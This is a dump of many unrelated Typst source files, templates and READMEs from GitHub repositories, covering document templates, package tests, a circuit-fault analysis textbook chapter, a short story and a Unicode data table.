spacing: 0pt,
grid(
column-gutter: 11pt,
columns: (2fr, 1fr),
align(
left,
text(size: 1.3em, weight: 700, tema)
),
v(2pt)+
align(
right,
emph(date)
)
)
)
block(spacing: .5em, line(length: 100%))
}
#let examplebox(..body) = showybox(
frame: (
body-color: yellow.lighten(85%),
title-color: yellow.lighten(90%),
border-color: yellow.darken(10%),
thickness: (left: 2pt),
radius: 0pt
),
title-style: (
color: black,
),
title: "Ejemplo / Caso",
..body
)
#let obsbox(..body) = showybox(
frame: (
body-color: blue.lighten(85%),
title-color: blue.lighten(90%),
border-color: blue.darken(10%),
thickness: (left: 2pt),
radius: 0pt
),
..body
)
#let gloss(size: 2cm, body) = showybox(
frame: (
body-color: luma(240),
border-color: luma(200),
thickness: (left: 2pt),
radius: 0pt
),
box(
height: size
)[
#align(center, text(size:1.2em, style: "italic", "Glosario"))
#columns(2, body)
]
)
#let figure-box(..body) = showybox(
frame: (
radius: 0pt,
),
shadow: (
color: black,
offset: 3pt
),
..body
) |
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/par/paragraph.typ | typst | Apache License 2.0 |
#let template(content) = {
set text(size: 14pt)
set par(justify: true, first-line-indent: 2em)
content
}
#show: template
#show raw: rect
#linebreak()
比起我们最初想要的representation theorem,这里证明的版本多出了一个条件:$η_1$ 和 $η_2$ 之间要存在至少一个relation $R in "Rel"_Σ (η_1, η_2)$。。但是,不是所有 $η_1$ 和 $η_2$ 之间都存在至少一个relation。例如,考虑一个abstract type $α$,它有如下的操作:
$ c: alpha #h(5em) f: alpha arrow "Ans" $
那么,不同的实现可以给 $(f c) : "Ans"$ 赋予不同的值,从而使用这个abstract type的程序就能观测出两个实现的不同了!所以,要求两个实现是被logical relation 连在一起是必要的、也是合理的。
虽然不受限制的representation theorem是不成立的,但是我们可以找到很多具体的例子,它们能够应用 fundamental theorem of logical relation。如果一个签名$Σ$里没有任何操作,那么此时任何两个实现$η_1$、$η_2$ 之间都可以联系起来:取 $ρ(α) = η_1 (α) times η_2 (α)$ 即可。这意味着,由于没有任何操作,α 中的任何值都是无法分辨的。更一般地,如果所有操作都形如$A_1 arrow ... arrow A_n arrow α$,也就是我们利用签名中的操作无法观测一个abstract type的话,那么同样可以证明任何两个实现都是related的,从而证明任何两个实现都无法区分。
```js
import { $typst } from '@myriaddreamin/typst.ts/dist/esm/contrib/snippet.mjs';
const mainContent = 'Hello, typst!';
console.log(await $typst.svg({ mainContent }));
```
比起我们最初想要的representation theorem,这里证明的版本多出了一个条件:$η_1$ 和 $η_2$ 之间要存在至少一个relation $R in "Rel"_Σ (η_1, η_2)$。。但是,不是所有 $η_1$ 和 $η_2$ 之间都存在至少一个relation。例如,考虑一个abstract type $α$,它有如下的操作:
$ c: alpha #h(5em) f: alpha arrow "Ans" $
那么,不同的实现可以给 $(f c) : "Ans"$ 赋予不同的值,从而使用这个abstract type的程序就能观测出两个实现的不同了!所以,要求两个实现是被logical relation 连在一起是必要的、也是合理的。
虽然不受限制的representation theorem是不成立的,但是我们可以找到很多具体的例子,它们能够应用 fundamental theorem of logical relation。如果一个签名$Σ$里没有任何操作,那么此时任何两个实现$η_1$、$η_2$ 之间都可以联系起来:取 $ρ(α) = η_1 (α) times η_2 (α)$ 即可。这意味着,由于没有任何操作,α 中的任何值都是无法分辨的。更一般地,如果所有操作都形如$A_1 arrow ... arrow A_n arrow α$,也就是我们利用签名中的操作无法观测一个abstract type的话,那么同样可以证明任何两个实现都是related的,从而证明任何两个实现都无法区分。
```js
import { $typst } from '@myriaddreamin/typst.ts/dist/esm/contrib/snippet.mjs';
const mainContent = 'Hello, typst!';
console.log(await $typst.svg({ mainContent }));
```
|
https://github.com/gvallinder/KTHThesis_Typst | https://raw.githubusercontent.com/gvallinder/KTHThesis_Typst/main/preface.typ | typst | MIT License | #pagebreak(to: "odd")
#heading(outlined: false, level: 1)[Preface]<preface>
The fonts used in this template are:
- Figtree, which is used for headings, headers and captions. You can download it at #link("https://fonts.google.com/specimen/Figtree")
- Georgia, which is used for body text. It is a serif font that is based on Times New Roman, but adapted slightly for legibility on screens. It is included in windows (and Mac too I think), so no need for any installation there.
- STIX Two Math, which is used for the math environment. This is used by IEEE in their templates and is available though the STIX project at #link("https://github.com/stipub/stixfonts/releases").
You can find references and tutorials for Typst in their web app #link("https://typst.app/") or on their github page #link("https://github.com/typst/typst")
#v(3em)
#block[Stockholm, 2024 \ _<NAME>_] |
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/text/hyphenate_00.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
// Test hyphenating english and greek.
#set text(hyphenate: true)
#set page(width: auto)
#grid(
columns: (50pt, 50pt),
[Warm welcomes to Typst.],
text(lang: "el")[διαμερίσματα. \ λατρευτός],
)
|
https://github.com/PabloRuizCuevas/numty | https://raw.githubusercontent.com/PabloRuizCuevas/numty/master/README.md | markdown | MIT License | ## Numty
### Numeric Typst
A library for performing mathematical operations on matrices, vectors/arrays, and numbers in Typst, with support for broadcasting and handling NaN values. Numty’s broadcasting rules and API are inspired by NumPy.
```typ
#import "numty.typ" as nt
// Define vectors and matrices
#let a = (1, 2, 3)
#let b = 2
#let m = ((1, 2), (1, 3))
// Element-wise operations with broadcasting
#nt.mult(a, b) // Multiply vector 'a' by scalar 'b': (2, 4, 6)
#nt.add(a, a) // Add two vectors: (2, 4, 6)
#nt.add(2, a) // Add scalar '2' to each element of vector 'a': (3, 4, 5)
#nt.add(m, 1) // Add scalar '1' to each element of matrix 'm': ((2, 3), (2, 4))
// Dot product of vectors
#nt.dot(a, a) // Dot product of vector 'a' with itself: 14
// Handling NaN cases in mathematical functions
#calc.sin((3, 4)) // Fails, as Typst does not support vector operations directly
#nt.sin((3.4)) // Sine of each element in vector: (0.14411, 0.90929)
// Generate equally spaced values and apply functions
#let x = nt.linspace(0, 10, 3) // Generate 3 equally spaced values between 0 and 10: (0, 5, 10)
#let y = nt.sin(x) // Apply sine function to each element: (0, -0.95, -0.54)
// Logical operations
#nt.eq(a, b) // Compare each element in 'a' to 'b': (false, true, false)
#nt.any(nt.eq(a, b)) // Check if any element in 'a' equals 'b': true
#nt.all(nt.eq(a, b)) // Check if all elements in 'a' equal 'b': false
// Handling special cases like division by zero
#nt.div((1, 3), (2, 0)) // Element-wise division, with NaN for division by zero: (0.5, float.nan)
// Matrix operations (element-wise)
#nt.add(m, 1) // Add scalar to matrix elements: ((2, 3), (2, 4))
```
## Supported Features:
### Logic Operations:
```typ
#import "numty.typ" as nt
#let a = (1,2,3)
#let b = 2
#nt.eq(a,b) // (false, true, false)
#nt.all(nt.eq(a,b)) // false
#nt.any(nt.eq(a,b)) // true
```
### Math operators:
All operators are element-wise,
traditional matrix multiplication is not yet supported.
```typ
#nt.add((0,1,3), 1) // (1,2,4)
#nt.mult((1,3),(2,2)) // (2,6)
#nt.div((1,3), (2,0)) // (0.5,float.nan)
```
### Algebra with Nan handling:
```typ
#nt.log((0,1,3)) // (float.nan, 0 , 0.47...)
#nt.sin((1,3)) // (0.84.. , 0.14...)
```
### Vector operations:
Basic vector operations
```typ
#nt.dot((1,2),(2,4)) // 9
#nt.normalize((1,4), l:1) // (1/5,4/5)
```
### Others:
Functions for creating equally spaced indexes in linear and logspace, usefull for log plots
```typ
#nt.linspace(0,10,3) // (0,5,10)
#nt.logspace(1,3,3)
#nt.geomspace(1,3,3)
```
### Printing
```typ
#nt.print((1,2),(4,2))) // to display in the pdf
```
|
https://github.com/typst-community/valkyrie | https://raw.githubusercontent.com/typst-community/valkyrie/main/tests/types/content/test.typ | typst | Other | #import "/src/lib.typ" as z
#set page(height: 1cm, width: 1cm)
#{
_ = z.parse([123465], z.content())
}
|
https://github.com/Az-21/typst-components | https://raw.githubusercontent.com/Az-21/typst-components/main/components/boxed_link.typ | typst | Creative Commons Zero v1.0 Universal | #let boxed_link(url, background: rgb("#d2e7f0"), foreground: rgb("#000000"), size: 10pt, width: 100%) = block(
width: width,
fill: background,
inset: (x: 3pt, y: 0pt),
outset: (y: 12pt),
radius: 2pt,
)[
#align(center,
text(fill: foreground, size: size, link(url))
)
]
|
https://github.com/MALossov/YunMo_Doc | https://raw.githubusercontent.com/MALossov/YunMo_Doc/main/contents/info.typ | typst | Apache License 2.0 | #let ReportTitle = "云MO监控"
#let Authors = () |
https://github.com/RaphGL/ElectronicsFromBasics | https://raw.githubusercontent.com/RaphGL/ElectronicsFromBasics/main/DC/chap5/7_component_failure_analysis.typ | typst | Other | #import "../../core/core.typ"
=== Component failure analysis
The job of a technician frequently entails \"troubleshooting\" (locating
and correcting a problem) in malfunctioning circuits. Good
troubleshooting is a demanding and rewarding effort, requiring a
thorough understanding of the basic concepts, the ability to formulate
hypotheses (proposed explanations of an effect), the ability to judge
the value of different hypotheses based on their probability (how likely
one particular cause may be over another), and a sense of creativity in
applying a solution to rectify the problem. While it is possible to
distill these skills into a scientific methodology, most practiced
troubleshooters would agree that troubleshooting involves a touch of
art, and that it can take years of experience to fully develop this art.
An essential skill to have is a ready and intuitive understanding of how
component faults affect circuits in different configurations. We will
explore some of the effects of component faults in both series and
parallel circuits here, then to a greater degree at the end of the
\"Series-Parallel Combination Circuits\" chapter.
Let\'s start with a simple series circuit:
#image("static/00098.png")
With all components in this circuit functioning at their proper values,
we can mathematically determine all currents and voltage drops:
#image("static/10089.png")
Now let us suppose that R#sub[2] fails shorted. #emph[Shorted] means
that the resistor now acts like a straight piece of wire, with little or
no resistance. The circuit will behave as though a \"jumper\" wire were
connected across R#sub[2] (in case you were wondering, \"jumper wire\"
is a common term for a temporary wire connection in a circuit). What
causes the shorted condition of R#sub[2] is no matter to us in this
example; we only care about its effect upon the circuit:
#image("static/00099.png")
With R#sub[2] shorted, either by a jumper wire or by an internal
resistor failure, the total circuit resistance will #emph[decrease].
Since the voltage output by the battery is a constant (at least in our
ideal simulation here), a decrease in total circuit resistance means
that total circuit current #emph[must increase]:
#image("static/10090.png")
As the circuit current increases from 20 milliamps to 60 milliamps, the
voltage drops across R#sub[1] and R#sub[3] (which haven\'t changed
resistances) increase as well, so that the two resistors are dropping
the whole 9 volts. R#sub[2], being bypassed by the very low resistance
of the jumper wire, is effectively eliminated from the circuit, the
resistance from one lead to the other having been reduced to zero. Thus,
the voltage drop across R#sub[2], even with the increased total current,
is zero volts.
On the other hand, if R#sub[2] were to fail \"open\" -- resistance
increasing to nearly infinite levels -- it would also create
wide-reaching effects in the rest of the circuit:
#image("static/00100.png")
#image("static/10091.png")
With R#sub[2] at infinite resistance and total resistance being the sum
of all individual resistances in a series circuit, the total current
decreases to zero. With zero circuit current, there is no electron flow
to produce voltage drops across R#sub[1] or R#sub[3]. R#sub[2], on the
other hand, will manifest the full supply voltage across its terminals.
We can apply the same before/after analysis technique to parallel
circuits as well. First, we determine what a \"healthy\" parallel
circuit should behave like.
#image("static/00101.png")
#image("static/10092.png")
Supposing that R#sub[2] opens in this parallel circuit, here\'s what the
effects will be:
#image("static/00102.png")
#image("static/10093.png")
Notice that in this parallel circuit, an open branch only affects the
current through that branch and the circuit\'s total current. Total
voltage -- being shared equally across all components in a parallel
circuit, will be the same for all resistors. Due to the fact that the
voltage source\'s tendency is to hold voltage #emph[constant], its
voltage will not change, and being in parallel with all the resistors,
it will hold all the resistors\' voltages the same as they were before:
9 volts. Being that voltage is the only common parameter in a parallel
circuit, and the other resistors haven\'t changed resistance value,
their respective branch currents remain unchanged.
This is what happens in a household lamp circuit: all lamps get their
operating voltage from power wiring arranged in a parallel fashion.
Turning one lamp on and off (one branch in that parallel circuit closing
and opening) doesn\'t affect the operation of other lamps in the room,
only the current in that one lamp (branch circuit) and the total current
powering all the lamps in the room:
#image("static/00357.png")
In an ideal case (with perfect voltage sources and zero-resistance
connecting wire), shorted resistors in a simple parallel circuit will
also have no effect on what\'s happening in other branches of the
circuit. In real life, the effect is not quite the same, and we\'ll see
why in the following example:
#image("static/00103.png")
#image("static/10094.png")
A shorted resistor (resistance of 0 Ω) would theoretically draw infinite
current from any finite source of voltage (I\=E/0). In this case, the
zero resistance of R#sub[2] decreases the circuit total resistance to
zero Ω as well, increasing total current to a value of infinity. As long
as the voltage source holds steady at 9 volts, however, the other branch
currents (I#sub[R1] and I#sub[R3]) will remain unchanged.
The critical assumption in this \"perfect\" scheme, however, is that the
voltage supply will hold steady at its rated voltage while supplying an
infinite amount of current to a short-circuit load. This is simply not
realistic. Even if the short has a small amount of resistance (as
opposed to absolutely zero resistance), no #emph[real] voltage source
could arbitrarily supply a huge overload current and maintain steady
voltage at the same time. This is primarily due to the internal
resistance intrinsic to all electrical power sources, stemming from the
inescapable physical properties of the materials they\'re constructed
of:
#image("static/00104.png")
These internal resistances, small as they may be, turn our simple
parallel circuit into a series-parallel combination circuit. Usually,
the internal resistances of voltage sources are low enough that they can
be safely ignored, but when high currents resulting from shorted
components are encountered, their effects become very noticeable. In
this case, a shorted R#sub[2] would result in almost all the voltage
being dropped across the internal resistance of the battery, with almost
no voltage left over for resistors R#sub[1], R#sub[2], and R#sub[3]:
#image("static/00105.png")
#image("static/10095.png")
Suffice it to say, intentional direct short-circuits across the
terminals of any voltage source is a bad idea. Even if the resulting
high current (heat, flashes, sparks) causes no harm to people nearby,
the voltage source will likely sustain damage, unless it has been
specifically designed to handle short-circuits, which most voltage
sources are not.
Eventually in this book I will lead you through the analysis of circuits
#emph[without the use of any numbers], that is, analyzing the effects of
component failure in a circuit without knowing exactly how many volts
the battery produces, how many ohms of resistance is in each resistor,
etc. This section serves as an introductory step to that kind of
analysis.
Whereas the normal application of Ohm\'s Law and the rules of series and
parallel circuits is performed with numerical quantities
(#emph[\"quantitative\"]), this new kind of analysis without precise
numerical figures is something I like to call #emph[qualitative]
analysis. In other words, we will be analyzing the #emph[qualities] of
the effects in a circuit rather than the precise #emph[quantities]. The
result, for you, will be a much deeper intuitive understanding of
electric circuit operation.
#core.review[
- To determine what would happen in a circuit if a component fails,
re-draw that circuit with the equivalent resistance of the failed
component in place and re-calculate all values.
- The ability to intuitively determine what will happen to a circuit
with any given component fault is a #emph[crucial] skill for any
electronics troubleshooter to develop. The best way to learn is to
experiment with circuit calculations and real-life circuits, paying
close attention to what changes with a fault, what remains the same,
and #emph[why]!
- A #emph[shorted] component is one whose resistance has dramatically
decreased.
- An #emph[open] component is one whose resistance has dramatically
increased. For the record, resistors tend to fail open more often than
fail shorted, and they almost never fail unless physically or
electrically overstressed (physically abused or overheated).
]
|
https://github.com/el-ev/simple-assignment-template | https://raw.githubusercontent.com/el-ev/simple-assignment-template/main/template.typ | typst | MIT License | #let justify_align(left_body, right_body) = {
block[
#box(width: 1fr)[
#align(left)[
#left_body
]
]
#box(width: 1fr)[
#align(right)[
#right_body
]
]
]
}
#let box(contents) = {
rect(
fill: rgb(242,242,242),
stroke: 0pt,
width: 100%,
align(left)[#contents]
)
}
#let simple_answer(question, term) = {
[=== #question]
box(term)
}
#let answer(question, numbering_fmt: "a", ..answers) = {
[=== #question]
let length = answers.pos().len()
for i in range(0, length) {
let answer = answers.pos().at(i)
let question_number = numbering(numbering_fmt, i+1)
[==== #question_number]
box(answer)
}
}
#let init(title, author, student_number: none, body) = {
set document(title: title, author: author)
set page(
paper: "a4",
margin: (left: 10mm, right: 10mm, top: 10mm, bottom: 10mm),
footer: [
#set text(fill: gray, size: 8pt)
#justify_align[
#smallcaps[#datetime.today().display("Compiled at [year]-[month]-[day]")]
][
#counter(page).display()
]
],
footer-descent: 0pt,
)
set text(font: "PingFang SC")
align(top + left)[Name: #author]
if student_number != none {
align(top + left)[Student ID: #student_number]
}
align(center)[= #title]
body
} |
https://github.com/jackkyyh/ZXCSS | https://raw.githubusercontent.com/jackkyyh/ZXCSS/main/import.typ | typst | #import "@preview/polylux:0.3.1": *
#import "@preview/physica:0.8.1":bra, ket
#import "@preview/tablex:0.0.6": tablex, hlinex, vlinex, cellx
#import "@preview/xarrow:0.2.0": xarrow
// #import "@preview/commute:0.2.0": node, arr, commutative-diagram
#import themes.metropolis: *
#let write_footer(footer) = {m-footer.update[#text(size: 14pt)[#footer]]}
#let reset_footer() = {m-footer.update([])}
#let eqt(sup, sub: none) = math.attach(math.limits(xarrow(sym: sym.eq, text(0.7em)[#sup])), b: text(0.7em)[#sub])
#let cbox = box.with(stroke: 2pt + gray, inset: 15pt, radius: 10pt)
#let all_table = tablex(columns: (6em, 1fr, 1fr, 1fr, 1fr, 1fr, 1fr), rows: (1fr), align: horizon+center,
auto-lines: false,
(), vlinex(stroke: 2.5pt), vlinex(), vlinex(),vlinex(), vlinex(), vlinex(),
[],[square],[Steane],[$[| 5, 1, 3 |]$],[cubic],[QRM],[$[| 10, 1, 2 |]$],
hlinex(stroke: 2.5pt),
[stab. group],[],[],[],[],[],[],
hlinex(start: 0, end: 1),
[geometry],[],[],[],[],[],[],
hlinex(start: 0, end: 1),
[tanner graph],[],[],[],[],[],[],
hlinex(start: 0, end: 1),
[circuit],[],[],[],[],[],[],
)
#let stean_reprs = [
#place(dx: 10pt, dy: 10pt)[$X_1 X_3 X_5 X_7$\ $X_2 X_3 X_6 X_7$\ $ dots.v $]
#place(dx: 150pt, dy: 30pt)[#image("./figs/steane/geo.svg", width: 6cm)]
#place(dx: 350pt, dy: 30pt)[#image("./figs/steane/tanner.png", width: 6cm)]
#place(dx: 580pt, dy: -60pt)[#image("./figs/steane/circ.png", width: 6cm)]
]
#let stean_arrows = [
#place(dx: 10cm, dy: -6.5cm)[
$[| 7, 1, 3 |]$\ Steane code]
#place(dx: 90pt, dy: -80pt)[#rotate(-40deg)[#xarrow(sym: sym.arrow.l, margin: 25pt, [stabilizer group])]]
#place(dx: 220pt, dy: -60pt)[#rotate(-70deg)[#xarrow(sym: sym.arrow.l, margin: 25pt, [geometry])]]
#place(dx: 330pt, dy: -60pt)[#rotate(70deg)[#xarrow(sym: sym.arrow, margin: 20pt, [tanner graph])]]
#place(dx: 450pt, dy: -90pt)[#rotate(30deg)[#xarrow(sym: sym.arrow, margin: 25pt, [encoder])]]
] |
|
https://github.com/jgm/typst-hs | https://raw.githubusercontent.com/jgm/typst-hs/main/test/typ/compiler/ops-03.typ | typst | Other | // Subtraction.
#test(1-4, 3*-1)
#test(4cm - 2cm, 2cm)
#test(1e+2-1e-2, 99.99)
// Multiplication.
#test(2 * 4, 8)
// Division.
#test(12pt/.4, 30pt)
#test(7 / 2, 3.5)
// Combination.
#test(3-4 * 5 < -10, true)
#test({ let x; x = 1 + 4*5 >= 21 and { x = "a"; x + "b" == "ab" }; x }, true)
// With block.
#test(if true {
1
} + 2, 3)
// Mathematical identities.
#let nums = (
1, 3.14,
12pt, 3em, 12pt + 3em,
45deg,
90%,
13% + 10pt, 5% + 1em + 3pt,
2.3fr,
)
#for v in nums {
// Test plus and minus.
test(v + v - v, v)
test(v - v - v, -v)
// Test plus/minus and multiplication.
test(v - v, 0 * v)
test(v + v, 2 * v)
// Integer addition does not give a float.
if type(v) != "integer" {
test(v + v, 2.0 * v)
}
if "relative" not in type(v) and ("pt" not in repr(v) or "em" not in repr(v)) {
test(v / v, 1.0)
}
}
// Make sure length, ratio and relative length
// - can all be added to / subtracted from each other,
// - multiplied with integers and floats,
// - divided by integers and floats.
#let dims = (10pt, 1em, 10pt + 1em, 30%, 50% + 3cm, 40% + 2em + 1cm)
#for a in dims {
for b in dims {
test(type(a + b), type(a - b))
}
for b in (7, 3.14) {
test(type(a * b), type(a))
test(type(b * a), type(a))
test(type(a / b), type(a))
}
}
// Test division of different numeric types with zero components.
#for a in (0pt, 0em, 0%) {
for b in (10pt, 10em, 10%) {
test((2 * b) / b, 2)
test((a + b * 2) / b, 2)
test(b / (b * 2 + a), 0.5)
}
}
|
https://github.com/polarkac/MTG-Stories | https://raw.githubusercontent.com/polarkac/MTG-Stories/master/stories/004%20-%20Dragon's%20Maze/010_Paper%20Trail.typ | typst | #import "@local/mtgstory:0.2.0": conf
#show: doc => conf(
"Paper Trail",
set_name: "Dragon's Maze",
story_date: datetime(day: 12, month: 06, year: 2013),
author: "<NAME>",
doc
)
#box(inset: (left: 2.0mm), stroke: (left: 0.5mm + gray))[Diary,
Today is the best day ever! Mama bought me a snapjaw egg at the market! I promised to take good care of it and clean up after it and make sure that it doesn’t eat anything important. Snapjaws are the best pets! Lev had one, and nobody messed with him after that. We’re going to be best friends.
Ruslan]
#box(inset: (left: 2.0mm), stroke: (left: 0.5mm + gray))[Diary,
Today, Kuba is three weeks old. He’s gotten so big! Mama likes him because he eats the rats, but he eats pretty much anything we let him. He follows me everywhere and he’s super nice. I feed him what’s left over from my lunch and he licks my face. Alena’s mad at me because she says Kuba ate her dog, but I know he didn’t and anyway her stupid dog bit me yesterday so it would serve her right.
Ruslan]
#box(inset: (left: 2.0mm), stroke: (left: 0.5mm + gray))[Diary,
Kuba ran away. He chased something into the sewers and didn’t come back. Mama says I can get another one, but I don’t want another one. I want Kuba to come home.
Ruslan]
#figure(image("010_Paper Trail/02.jpg", width: 100%), caption: [], supplement: none, numbering: none)
#strong[12 Griev, Drudge-Monitor’s Log]
Sewage reclamation proceeding without incident. Three workers cycled during the past week, and two have returned. No net loss of efficiency in our sector.
A snapjaw made its way into the rot farm today, presumably from Above. It’s been fighting and eating nonstop since its arrival. A couple of us have taken bets on how long it will live.
#strong[19 Griev, Drudge-Monitor’s Log]
The snapjaw has gotten out of hand. It ate two of the workers, so we brought in a handler to put it to better purpose. Then it ate the handler. While I’m sure with sufficient effort we could put the beast to good use, I don’t believe it’s worth the effort and losses. I’m planning on having it herded through an outflow grate into Izzet League territory. Let it eat some of them. We’ve got real work to do.
#figure(image("010_Paper Trail/04.jpg", width: 100%), caption: [], supplement: none, numbering: none)
#strong[Trial Proposal #1547, <NAME>, Mechanoaugmentation Specialist, Third Class]
Background: Implementation of biomechanical augmentation systems have been historically hampered as the mental faculties of the implanted organism lack the instinctive neural pathways to handle the sudden integration of the new devices.
Question: Can a neuroamplification serum be applied to a subject in concert with an implanted mechanical augmentation in order to give the subject the ability to integrate the augmentation into its instinctive biological processes?
Methods: Implant a simple mizzium mechanical augmentation framework into a biological organism in concert with neuroamplification serum (formula \#R-25J12) to determine if the biological organism will exert mental control over the framework without destroying either the organism or the framework.
Safety Protocols: Impact projected to be minimal. Low-security bioenclosure requested.
#figure(image("010_Paper Trail/06.jpg", width: 100%), caption: [], supplement: none, numbering: none)
Speaker Trifon,
I am pleased to inform you of the results of a series of projects that have recently come to an end. As you have been notified, several weeks ago, we discovered a badly injured creature wading along the Northern Interior coast. We coaxed it into incubation in order to heal it, and an unexpected set of reactions began.
While I posit that the creature began life as a common snapjaw, it has certainly had an eventful life. Its enhanced size and musculature are consistent with creatures raised by the Golgari, while its reinforced skeletal system is clearly the result of malicious Izzet tinkering. We surgically excised most of those mechanisms, but could not remove all of them for fear of damaging its central nervous system.
I used a standard set of mixtures for the incubation chamber, but it seems that this snapjaw was destined for something greater than either its origin, or even I, had intended for it. It began to manifest incredible intellectual expansion, and whether through contamination, or, as I theorize, some sort of #emph[ideal internal] to its own nascent consciousness—it began to develop approximations of humanoid features. I believe that it is on the verge of demonstrating sapience. My enthusiasm over this accomplishment is diminished only by the fact that I have no idea how I would ever replicate it.
You will, of course, be kept apprised of the subject’s progress, although I intend for the subject’s life and choices to become increasingly self-directed over time.
Stanisil, Biomancer, <NAME>
#figure(image("010_Paper Trail/08.jpg", width: 100%), caption: [], supplement: none, numbering: none)
Stanisil has asked me to record my thoughts and feelings as I, and they, develop. I look at these #emph[hands] , and I do not fully recognize them as my own. I remember the idea of hands, and I remember what my forelimbs used to be. Neither of those things are what currently grip this quill. I am frequently asked what I #emph[want] , how I #emph[feel] , and I do not know what to say. The Simic have taken exceptional care of me, and they treat me with respect. But it is their curiosity that I feel more than anything else. I am being studied, and I do not like it.
I am told that I have the freedom to go where I wish, and do as I please. The idea terrifies me. Sometimes, I want nothing more than to find a warm place in the sun. Everything feels so new.
There is another thing that my mind keeps returning to, but I hesitate to share it, even with Stanisil. There is an image of a human boy. I remember his kindness. I remember being happy. I remember…
#emph[Home] .
I want to go home. And I think I remember the way.
|
|
https://github.com/LeeWooQM/TypstNote | https://raw.githubusercontent.com/LeeWooQM/TypstNote/main/README.md | markdown | MIT License | # Simple Note for Typst
This project uses the code of
https://github.com/Fr4nk1in-USTC/typst-notebook
### How to use it
- Copy temp.typ to your document's folder
- Adding these codes at the top of your source code
```typst
#import "temp.typ": note
#import "temp.typ": theorem
#import "temp.typ": definition
#import "temp.typ": deduction
#import "temp.typ": proof
```
- Use the note function to justify your document
```typst
#show: doc => note(
title: "Note Title", //title
author: "Name",
mail: "<EMAIL>",
logo: none, //the logo displayed in the title page
preface: none, //preface
boxed_heading: false, //enable the custom heading style
)[ some things... ]
```
- create different environment
```typst
#definition(name: "Some definition")[
Some definition...
]
#deduction( name: "Some equation" )[
Some equation...
]
#theorem( name: "theorem" )[
some theorem...
]
#proof()[
Some proof...
]
```
You can also create your own new environment by adding such code in temp.typ
```typst
#let somefunc = base_env.with(
type: "Something",
fg: Somecolor,
bg: Somecolor,
)
```
To use it, add `import "temp.typ: somefunc"` |
https://github.com/detypstify/detypstify | https://raw.githubusercontent.com/detypstify/detypstify/main/paper/README.md | markdown | # Neural Information Processing Systems (NeurIPS)
## Usage
You can use this template in the Typst web app by clicking _Start from
template_ on the dashboard and searching for `bloated-neurips`.
Alternatively, you can use the CLI to kick this project off using the command
```shell
typst init @preview/bloated-neurips
```
Typst will create a new directory with all the files needed to get you started.
## Configuration
This template exports the `neurips2023` function with the following named
arguments.
- `title`: The paper's title as content.
- `authors`: An array of author dictionaries. Each of the author dictionaries
must have a name key and can have the keys department, organization,
location, and email.
- `abstract`: The content of a brief summary of the paper or none. Appears at
the top under the title.
- `bibliography`: The result of a call to the bibliography function or none.
The function also accepts a single, positional argument for the body of the
paper.
- `accepted`: If this is set to `false` then anonymized ready for submission
document is produced; `accepted: true` produces camera-redy version. If
the argument is set to `none` then preprint version is produced (can be
uploaded to arXiv).
The template will initialize your package with a sample call to the `neurips2023`
function in a show rule. If you want to change an existing project to use this
template, you can add a show rule at the top of your file.
## Issues
This template is developed at [daskol/typst-templates][1] repo. Please report
all issues there.
- The biggest and the most important issues is related to line ruler. We are
not aware of universal method for numbering lines in the main body of a
paper.
- There is an issue in Typst with spacing between figures and between figure
with floating placement. The issue is that there is no way to specify gap
between subsequent figures. In order to have behaviour similar to original
LaTeX template, one should consider direct spacing adjacemnt with `v(-1em)`
as follows.
```typst
#figure(
rect(width: 4.25cm, height: 4.25cm, stroke: 0.4pt),
caption: [Sample figure caption.#v(-1em)],
placement: top,
)
#figure(
rect(width: 4.25cm, height: 4.25cm, stroke: 0.4pt),
caption: [Sample figure caption.],
placement: top,
)
```
- Another issue is related to Typst's inablity to produce colored annotation.
In order to mitigte the issue, we add a script which modifies annotations and
make them colored.
```shell
../colorize-annotations.py \
example-paper.typst.pdf example-paper-colored.typst.pdf
```
See [README.md][1] for details.
- NeurIPS 2023 instructions discuss bibliography in vague terms. Namely, there
is not specific requirements. Thus we stick to `ieee` bibliography style
since we found it in several accepted papers and it is similar to that in the
example paper.
- It is unclear how to render notice in the bottom of the title page in case of
final (`accepted: true`) or preprint (`accepted: none`) submission.
[1]: example-paper.latex.pdf
[2]: example-paper.typst.pdf
[3]: ../#colored-annotations
|
|
https://github.com/pank-su/typst-gost | https://raw.githubusercontent.com/pank-su/typst-gost/main/main.typ | typst | #import "templates/index.typ": *
#import "templates/utils.typ": *
// Тут указываем только авторов [authors] и название работы [title]
#show: index.with(authors: ("<NAME>", ), )
#ch("Introduction")
#lorem(60)
= In this paper
#lorem(20)
=== Contributions
#lorem(40)
= Related Work
#lorem(500)
|
|
https://github.com/veilkev/jvvslead | https://raw.githubusercontent.com/veilkev/jvvslead/Typst/files/count.typ | typst | #import "../sys/packages.typ": *
#import "../sys/sys.typ": *
#import "../sys/header.typ": *
#import "@preview/bob-draw:0.1.0": *
// Space between header
#v(150pt)
// Shows heading
#text(size: 12pt
)[= Counting In/Out]
#note("Description")
Bank 99 \
#sym.arrow.r Bank Till (_for general store use_)\
#sym.arrow.r New Till (_Business Center: \$285_)\
#sym.arrow.r Bank Coin (_Rolls of Coins_)\
#sym.arrow.r Safe Coin (_Boxes of Coins_)\
#sym.arrow.r Bank Safe (_Bundles of Bills_)\ |
|
https://github.com/typst/packages | https://raw.githubusercontent.com/typst/packages/main/packages/preview/unichar/0.1.0/ucd/block-10D40.typ | typst | Apache License 2.0 | #let data = (
("GARAY DIGIT ZERO", "Nd", 0),
("GARAY DIGIT ONE", "Nd", 0),
("GARAY DIGIT TWO", "Nd", 0),
("GARAY DIGIT THREE", "Nd", 0),
("GARAY DIGIT FOUR", "Nd", 0),
("GARAY DIGIT FIVE", "Nd", 0),
("GARAY DIGIT SIX", "Nd", 0),
("GARAY DIGIT SEVEN", "Nd", 0),
("GARAY DIGIT EIGHT", "Nd", 0),
("GARAY DIGIT NINE", "Nd", 0),
("GARAY VOWEL SIGN A", "Lo", 0),
("GARAY VOWEL SIGN I", "Lo", 0),
("GARAY VOWEL SIGN O", "Lo", 0),
("GARAY VOWEL SIGN EE", "Lo", 0),
("GARAY VOWEL LENGTH MARK", "Lm", 0),
("GARAY SUKUN", "Lo", 0),
("GARAY CAPITAL LETTER A", "Lu", 0),
("GARAY CAPITAL LETTER CA", "Lu", 0),
("GARAY CAPITAL LETTER MA", "Lu", 0),
("GARAY CAPITAL LETTER KA", "Lu", 0),
("GARAY CAPITAL LETTER BA", "Lu", 0),
